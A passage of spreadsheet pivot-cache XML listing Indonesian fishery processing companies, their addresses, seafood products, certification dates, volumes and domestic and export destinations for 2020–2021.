    <s v="CV. JESSLYN INDAH LESTARI"/>
    <s v="Dusun Nirwana RT 10 RW 04, Kel. Sungai Kakap, Kec. Sungai Kakap, Kabupaten Kubu Raya&lt;br&gt;Kalimantan Barat"/>
    <n v="20"/>
    <s v="Udang Segar"/>
    <d v="2021-01-14T00:00:00"/>
    <n v="32000"/>
    <s v="Kota Pontianak"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="22592"/>
    <x v="713"/>
    <s v="CV. JESSLYN INDAH LESTARI"/>
    <s v="Dusun Nirwana RT 10 RW 04, Kel. Sungai Kakap, Kec. Sungai Kakap, Kabupaten Kubu Raya&lt;br&gt;Kalimantan Barat"/>
    <n v="20"/>
    <s v="Rajungan Segar"/>
    <d v="2021-01-14T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Pontianak"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="22593"/>
    <x v="713"/>
    <s v="CV. JESSLYN INDAH LESTARI"/>
    <s v="Dusun Nirwana RT 10 RW 04, Kel. Sungai Kakap, Kec. Sungai Kakap, Kabupaten Kubu Raya&lt;br&gt;Kalimantan Barat"/>
    <n v="20"/>
    <s v="Cephalopoda Segar (Cumi-cumi)"/>
    <d v="2021-01-14T00:00:00"/>
    <n v="14000"/>
    <s v="Kota Pontianak"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="22601"/>
    <x v="714"/>
    <s v="PT. GALESONG"/>
    <s v="Jl. Baso Dg. Bella No. 8, Kel. Kalukuang, Kec. Galesong, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2020-10-26T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="22602"/>
    <x v="715"/>
    <s v="PT. JAGANNATHA ELANG PRATAMA"/>
    <s v="Dusun Stasiun RT 01 RW 01, Kel. Sukomulyo, Kec. Pajarakan, Kabupaten Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-12-07T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22603"/>
    <x v="715"/>
    <s v="PT. JAGANNATHA ELANG PRATAMA"/>
    <s v="Dusun Stasiun RT 01 RW 01, Kel. Sukomulyo, Kec. Pajarakan, Kabupaten Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-12-07T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22604"/>
    <x v="715"/>
    <s v="PT. JAGANNATHA ELANG PRATAMA"/>
    <s v="Dusun Stasiun RT 01 RW 01, Kel. Sukomulyo, Kec. Pajarakan, Kabupaten Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Bandeng Beku"/>
    <d v="2020-12-07T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22608"/>
    <x v="716"/>
    <s v="PT. PANCA MITRA MULTI PERDANA"/>
    <s v="Jl. Raya Banyuwangi Km 10, Kel. Landangan, Kec. Kapongan, Kabupaten Situbondo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-11-19T00:00:00"/>
    <n v="3600000"/>
    <s v="Kota Jakarta Pusat, Kabupaten Semarang, Kabupaten Malang, Kota Surabaya, Kota Denpasar, Kota Makassar"/>
    <s v="Canada, Japan, United States"/>
  </r>
  <r>
    <n v="22609"/>
    <x v="716"/>
    <s v="PT. PANCA MITRA MULTI PERDANA"/>
    <s v="Jl. Raya Banyuwangi Km 10, Kel. Landangan, Kec. Kapongan, Kabupaten Situbondo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-11-19T00:00:00"/>
    <n v="5400000"/>
    <m/>
    <s v="Canada, Denmark, Japan, United States"/>
  </r>
  <r>
    <n v="22610"/>
    <x v="717"/>
    <s v="PT. TERUSAN JAYA BERSAMA"/>
    <s v="Pulau Abang, Kel. Pulau Abang, Kec. Galang, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Bawal Hitam, Talang-Talang, Selar, Tenggiri, Dingkis)"/>
    <d v="2021-01-28T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="22611"/>
    <x v="717"/>
    <s v="PT. TERUSAN JAYA BERSAMA"/>
    <s v="Pulau Abang, Kel. Pulau Abang, Kec. Galang, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Manyung, Kerapu, Merah, Baronang, Kaci-Kaci, Timun, Ekor Kuning)"/>
    <d v="2021-01-28T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="22612"/>
    <x v="717"/>
    <s v="PT. TERUSAN JAYA BERSAMA"/>
    <s v="Pulau Abang, Kel. Pulau Abang, Kec. Galang, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Segar (Sotong, Cumi-Cumi)"/>
    <d v="2021-01-28T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="22614"/>
    <x v="250"/>
    <s v="PT. AGRITA BEST SEAFOOD"/>
    <s v="Gedung Coolroom No.4 Kawasan Pelabuhan Muara Angke, Jl. Dermaga Muara Angke No.4, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-10-15T00:00:00"/>
    <n v="100"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22615"/>
    <x v="250"/>
    <s v="PT. AGRITA BEST SEAFOOD"/>
    <s v="Gedung Coolroom No.4 Kawasan Pelabuhan Muara Angke, Jl. Dermaga Muara Angke No.4, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemuru, Kembung, Marlin, Layang, Cakalang, Tenggiri, Pedang)"/>
    <d v="2020-10-15T00:00:00"/>
    <n v="200"/>
    <s v="Kabupaten Banyuwangi"/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22616"/>
    <x v="250"/>
    <s v="PT. AGRITA BEST SEAFOOD"/>
    <s v="Gedung Coolroom No.4 Kawasan Pelabuhan Muara Angke, Jl. Dermaga Muara Angke No.4, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Beku"/>
    <d v="2020-10-15T00:00:00"/>
    <n v="100"/>
    <m/>
    <s v="Suriname"/>
  </r>
  <r>
    <n v="22617"/>
    <x v="250"/>
    <s v="PT. AGRITA BEST SEAFOOD"/>
    <s v="Gedung Coolroom No.4 Kawasan Pelabuhan Muara Angke, Jl. Dermaga Muara Angke No.4, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Gulama, Lencam, Kerapu, Layur, Sukang, Kakatua, Bawal, Kakap)"/>
    <d v="2020-10-15T00:00:00"/>
    <n v="100"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="22618"/>
    <x v="718"/>
    <s v="PT. MULTI MINA REJEKI"/>
    <s v="Jl. Dermaga Muara Angke No. 10, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-Cumi)"/>
    <d v="2020-10-19T00:00:00"/>
    <n v="1200000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22619"/>
    <x v="718"/>
    <s v="PT. MULTI MINA REJEKI"/>
    <s v="Jl. Dermaga Muara Angke No. 10, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Kembung, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-10-19T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22620"/>
    <x v="718"/>
    <s v="PT. MULTI MINA REJEKI"/>
    <s v="Jl. Dermaga Muara Angke No. 10, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Bawal Hitam, Lencam, Senangin, Manyung, Kerapu, Layur, Kakap Merah, Kurisi, Ekor Kuning)"/>
    <d v="2020-10-19T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22621"/>
    <x v="718"/>
    <s v="PT. MULTI MINA REJEKI"/>
    <s v="Jl. Dermaga Muara Angke No. 10, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Segar (Tenggiri)"/>
    <d v="2020-10-26T00:00:00"/>
    <n v="50000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22622"/>
    <x v="718"/>
    <s v="PT. MULTI MINA REJEKI"/>
    <s v="Jl. Dermaga Muara Angke No. 10, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Fillet Ikan Segar"/>
    <d v="2020-10-26T00:00:00"/>
    <n v="75000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="22623"/>
    <x v="691"/>
    <s v="PT. SAMUDRA MANDIRI SENTOSA"/>
    <s v="Jl. Wolter Mongisidi Km 5, Kel. Wangurer, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Bonito, Malalugis, Cakalang, Ekor Kuning)"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="3000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Taiwan, Province of China, Thailand, United States"/>
  </r>
  <r>
    <n v="22624"/>
    <x v="719"/>
    <s v="PT. CASSANATAMA NATURINDO"/>
    <s v="Jl. Banget Ayu RT 01 RW 05, Kel. Banget Ayu Kulon, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kerupuk Udang"/>
    <d v="2020-12-08T00:00:00"/>
    <n v="587500"/>
    <m/>
    <s v="Netherlands, United Kingdom"/>
  </r>
  <r>
    <n v="22625"/>
    <x v="720"/>
    <s v="PT. TRI MITRA MAKMUR - PLANT 2"/>
    <s v="Jl. Wonokoyo RT 02 RW 03, Kel. Landangan, Kec. Kapongan, Kabupaten Situbondo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="3600000"/>
    <m/>
    <s v="Canada, Japan, United States"/>
  </r>
  <r>
    <n v="22626"/>
    <x v="720"/>
    <s v="PT. TRI MITRA MAKMUR - PLANT 2"/>
    <s v="Jl. Wonokoyo RT 02 RW 03, Kel. Landangan, Kec. Kapongan, Kabupaten Situbondo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="5400000"/>
    <m/>
    <s v="Canada, Japan, United States"/>
  </r>
  <r>
    <n v="22627"/>
    <x v="721"/>
    <s v="PT, ALVIA TRI MANDIRI"/>
    <s v="Komp, Prima Centre Jl, Pool PPD Blok A No,1, Kel, Kedaung Kaliangke, Kec, Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Refined Carrageenan"/>
    <d v="2020-12-18T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Barat, Kabupaten Bogor, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="22628"/>
    <x v="722"/>
    <s v="CV. SEA HARVEST"/>
    <s v="Komplek Pergudangan Bandara Benda Permai Blok E No.20 Jl. Raya Perancis No.688 RT 003 RW 008, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Hidup"/>
    <d v="2020-10-27T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22629"/>
    <x v="722"/>
    <s v="CV. SEA HARVEST"/>
    <s v="Komplek Pergudangan Bandara Benda Permai Blok E No.20 Jl. Raya Perancis No.688 RT 003 RW 008, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Keong Laut Hidup"/>
    <d v="2020-10-27T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22630"/>
    <x v="722"/>
    <s v="CV. SEA HARVEST"/>
    <s v="Komplek Pergudangan Bandara Benda Permai Blok E No.20 Jl. Raya Perancis No.688 RT 003 RW 008, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Air Tawar Hidup"/>
    <d v="2020-10-27T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22631"/>
    <x v="722"/>
    <s v="CV. SEA HARVEST"/>
    <s v="Komplek Pergudangan Bandara Benda Permai Blok E No.20 Jl. Raya Perancis No.688 RT 003 RW 008, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerapu Hidup"/>
    <d v="2020-10-27T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22632"/>
    <x v="722"/>
    <s v="CV. SEA HARVEST"/>
    <s v="Komplek Pergudangan Bandara Benda Permai Blok E No.20 Jl. Raya Perancis No.688 RT 003 RW 008, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Lobster Hidup"/>
    <d v="2020-10-27T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22633"/>
    <x v="722"/>
    <s v="CV. SEA HARVEST"/>
    <s v="Komplek Pergudangan Bandara Benda Permai Blok E No.20 Jl. Raya Perancis No.688 RT 003 RW 008, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Belut Hidup"/>
    <d v="2020-10-27T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="China, Hong Kong"/>
  </r>
  <r>
    <n v="22634"/>
    <x v="722"/>
    <s v="CV. SEA HARVEST"/>
    <s v="Komplek Pergudangan Bandara Benda Permai Blok E No.20 Jl. Raya Perancis No.688 RT 003 RW 008, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Ronggeng Hidup"/>
    <d v="2020-10-27T00:00:00"/>
    <n v="3000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="22636"/>
    <x v="723"/>
    <s v="HARAPAN BUNDA"/>
    <s v="Jorong Unggan Aro, Kel. Unggan, Kec. Sumpur Kudus, Kabupaten Sijunjung&lt;br&gt;Sumatera Barat"/>
    <n v="3"/>
    <s v="Stik Ikan"/>
    <d v="2020-10-13T00:00:00"/>
    <n v="360"/>
    <s v="Kabupaten Sijunjung"/>
    <m/>
  </r>
  <r>
    <n v="22639"/>
    <x v="723"/>
    <s v="HARAPAN BUNDA"/>
    <s v="Jorong Unggan Aro, Kel. Unggan, Kec. Sumpur Kudus, Kabupaten Sijunjung&lt;br&gt;Sumatera Barat"/>
    <n v="3"/>
    <s v="Rengginang Ikan"/>
    <d v="2020-10-13T00:00:00"/>
    <n v="360"/>
    <s v="Kabupaten Sijunjung"/>
    <m/>
  </r>
  <r>
    <n v="22640"/>
    <x v="724"/>
    <s v="PT. INDOPRIMA UTAMA MINA"/>
    <s v="Jl. Cakalang Kompleks Pelabuhan Perikanan Pantai Sorong, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Kembung, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-10-15T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Hong Kong, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22641"/>
    <x v="724"/>
    <s v="PT. INDOPRIMA UTAMA MINA"/>
    <s v="Jl. Cakalang Kompleks Pelabuhan Perikanan Pantai Sorong, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Udang Beku"/>
    <d v="2020-10-15T00:00:00"/>
    <n v="50000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22642"/>
    <x v="725"/>
    <s v="CV, GIGA SAMUDRA NUSANTARA"/>
    <s v="Jl, Patimura No,09, Kel, Kedungrejo, Kec, Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-08T00:00:00"/>
    <n v="150000000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="22643"/>
    <x v="277"/>
    <s v="PT. MEDAN TROPICAL CANNING &amp; FROZEN INDUSTRIES"/>
    <s v="Jl. K. L. Yos Sudarso KM 10.5 Kawasan Industri Medan, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-10-16T00:00:00"/>
    <n v="243500"/>
    <m/>
    <s v="Albania, Australia, Canada, Cyprus, Greece, Italy, Portugal"/>
  </r>
  <r>
    <n v="22644"/>
    <x v="277"/>
    <s v="PT. MEDAN TROPICAL CANNING &amp; FROZEN INDUSTRIES"/>
    <s v="Jl. K. L. Yos Sudarso KM 10.5 Kawasan Industri Medan, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kepiting Beku"/>
    <d v="2020-10-16T00:00:00"/>
    <n v="5200"/>
    <m/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="22645"/>
    <x v="277"/>
    <s v="PT. MEDAN TROPICAL CANNING &amp; FROZEN INDUSTRIES"/>
    <s v="Jl. K. L. Yos Sudarso KM 10.5 Kawasan Industri Medan, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Tembang, Kembung, Lemadang, Layang, Cakalang)"/>
    <d v="2020-10-16T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United Kingdom"/>
  </r>
  <r>
    <n v="22646"/>
    <x v="277"/>
    <s v="PT. MEDAN TROPICAL CANNING &amp; FROZEN INDUSTRIES"/>
    <s v="Jl. K. L. Yos Sudarso KM 10.5 Kawasan Industri Medan, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Malong, Sebelah, Manyung, Kerapu, Bawal, Kakap, Kurisi)"/>
    <d v="2020-10-16T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United Kingdom"/>
  </r>
  <r>
    <n v="22647"/>
    <x v="277"/>
    <s v="PT. MEDAN TROPICAL CANNING &amp; FROZEN INDUSTRIES"/>
    <s v="Jl. K. L. Yos Sudarso KM 10.5 Kawasan Industri Medan, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Daging Bekicot Beku"/>
    <d v="2020-10-16T00:00:00"/>
    <n v="11000"/>
    <m/>
    <s v="Korea, Republic of"/>
  </r>
  <r>
    <n v="22648"/>
    <x v="277"/>
    <s v="PT. MEDAN TROPICAL CANNING &amp; FROZEN INDUSTRIES"/>
    <s v="Jl. K. L. Yos Sudarso KM 10.5 Kawasan Industri Medan, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Beku"/>
    <d v="2020-10-16T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Portugal"/>
  </r>
  <r>
    <n v="22649"/>
    <x v="725"/>
    <s v="CV, GIGA SAMUDRA NUSANTARA"/>
    <s v="Jl, Patimura No,09, Kel, Kedungrejo, Kec, Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Air Tawar Beku (Lele, Belut, Gurami, Bandeng, Mujair)"/>
    <d v="2021-04-08T00:00:00"/>
    <n v="150000000"/>
    <s v="Kota Jakarta Selatan"/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="22653"/>
    <x v="726"/>
    <s v="PT. SURYA PUTRA SIMALUNGUN"/>
    <s v="Jl. Mulawarman RT 3, Desa Kerayaan, Kec. Sangkulirang, Kabupaten Kutai Timur&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Teripang Kering"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="12000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="22661"/>
    <x v="727"/>
    <s v="TANG SENG"/>
    <s v="Jl. Wisata Bahari No.8 Km 31 RT 006 RW 002, Kel. Kawal, Kec. Gunung Kijang, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Beku (Kerapu, Jahan, Haruan, Kemejan, Kakap)"/>
    <d v="2020-11-17T00:00:00"/>
    <n v="30000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang, Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22662"/>
    <x v="728"/>
    <s v="PT. BARUNA SEJAHTERA PERSADA"/>
    <s v="Jl. Dermaga Penyebrangan Kali Adem No.21 Room 06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22663"/>
    <x v="728"/>
    <s v="PT. BARUNA SEJAHTERA PERSADA"/>
    <s v="Jl. Dermaga Penyebrangan Kali Adem No.21 Room 06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22664"/>
    <x v="728"/>
    <s v="PT. BARUNA SEJAHTERA PERSADA"/>
    <s v="Jl. Dermaga Penyebrangan Kali Adem No.21 Room 06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Salem)"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22665"/>
    <x v="729"/>
    <s v="CV. AROMA"/>
    <s v="Jl. Cendana No.55 Dusun Silva Lambaroeh, Kel. Ulee Pata, Kec. Jaya Baru, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Abon Ikan"/>
    <d v="2020-10-13T00:00:00"/>
    <n v="600"/>
    <s v="Kota Banda Aceh"/>
    <m/>
  </r>
  <r>
    <n v="22666"/>
    <x v="727"/>
    <s v="TANG SENG"/>
    <s v="Jl. Wisata Bahari No.8 Km 31 RT 006 RW 002, Kel. Kawal, Kec. Gunung Kijang, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Layaran, Selar, Tenggiri)"/>
    <d v="2020-11-17T00:00:00"/>
    <n v="120000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang, Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22667"/>
    <x v="727"/>
    <s v="TANG SENG"/>
    <s v="Jl. Wisata Bahari No.8 Km 31 RT 006 RW 002, Kel. Kawal, Kec. Gunung Kijang, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-11-17T00:00:00"/>
    <n v="7000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang, Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22668"/>
    <x v="730"/>
    <s v="PT. SINGGASANA UNAGI INDONESIA"/>
    <s v="Dusun Jatisari RT 001 RW 002, Kel. Bomo, Kec. Blimbingsari, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sidat Panggang Beku"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="3700"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Banyuwangi, Kota Surabaya, Kota Denpasar"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22669"/>
    <x v="686"/>
    <s v="CV. KEN JAYA PERKASA"/>
    <s v="Desa Kauditan, Kec. Kauditan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Teri, Baby Tuna, Barakuda, Deho, Malalugis, Lemadang)"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="22670"/>
    <x v="686"/>
    <s v="CV. KEN JAYA PERKASA"/>
    <s v="Desa Kauditan, Kec. Kauditan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Lobster Beku"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="50"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22671"/>
    <x v="731"/>
    <s v="PT. MARINA BAHARI SEJAHTERA"/>
    <s v="Jl. Ringroad Dusun Pereng RT 001 RW 007, Kel. Gendong Kulon, Kec. Babat, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Panni, Tongkol, Kawabida, Layang, Salem)"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Lamongan"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="22672"/>
    <x v="731"/>
    <s v="PT. MARINA BAHARI SEJAHTERA"/>
    <s v="Jl. Ringroad Dusun Pereng RT 001 RW 007, Kel. Gendong Kulon, Kec. Babat, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Barramudi, Kakap)"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Lamongan"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="22673"/>
    <x v="731"/>
    <s v="PT. MARINA BAHARI SEJAHTERA"/>
    <s v="Jl. Ringroad Dusun Pereng RT 001 RW 007, Kel. Gendong Kulon, Kec. Babat, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Cumi-Cum)"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Lamongan"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="22674"/>
    <x v="731"/>
    <s v="PT. MARINA BAHARI SEJAHTERA"/>
    <s v="Jl. Ringroad Dusun Pereng RT 001 RW 007, Kel. Gendong Kulon, Kec. Babat, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Tuna Beku"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Lamongan"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="22675"/>
    <x v="732"/>
    <s v="PT. WILMAX BRILIAN PERKASA"/>
    <s v="Jl. Marsekal Surya Dharma Pergudangan Bandara Mas Blok A9, Kel. Selapang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Lobster Hidup"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="60000"/>
